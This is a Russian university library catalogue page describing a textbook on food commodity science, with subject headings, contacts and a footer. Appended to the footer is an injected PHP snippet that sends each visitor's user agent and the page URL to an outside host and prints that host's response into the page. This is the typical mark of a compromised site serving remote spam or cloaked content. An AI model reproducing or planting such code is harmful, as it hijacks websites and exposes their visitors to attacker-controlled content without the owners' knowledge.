ПРОДОВОЛЬСТВЕННЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ПРОДУКТЫ -- ЯИЧНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ВКУСОВЫЕ ТОВАРЫ -- ПЛОДООВОЩЫЕ ТОВАРЫ -- ЗЕРНО -- ПИЩЕВЫЕ КОНЦЕНТРАТЫ -- ПРИПРАВА -- ЧАЙ -- КОФЕ -- НАПИТОК чайный -- ПРЯНОСТИ -- ТАБАК -- НАПИТОК АЛКОГОЛЬНЫЙ -- НАПИТОК СЛАБОАЛКОГОЛЬНЫЙ -- НАПИТОК БЕЗАЛКОГОЛЬНЫЙ -- Крахмал -- Сахар -- Мед -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- МОЛОКО -- Мороженое -- СЫР -- ЖИР пищевой -- Масло растительное -- Маргарин -- Жир кулинарный -- МЯСО -- ЯЙЦЕПРОДУКТЫ -- Концентрат пищевой -- РЫБА

В книге рассматриваются основные вопросы товароведения продовольственных товаров в современных условиях; приведены необходимые <продавцу> и <товароведу> сведения по всем группам <товаров>, а также по вопросам <стандартизации> и <сертификации>, информационному обеспечению, которые позволят работникам торговли принимать квалифицированные решения в <коммерческой деятельности>.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2994 - 21.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.05 с.20 запросов, 0.66c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;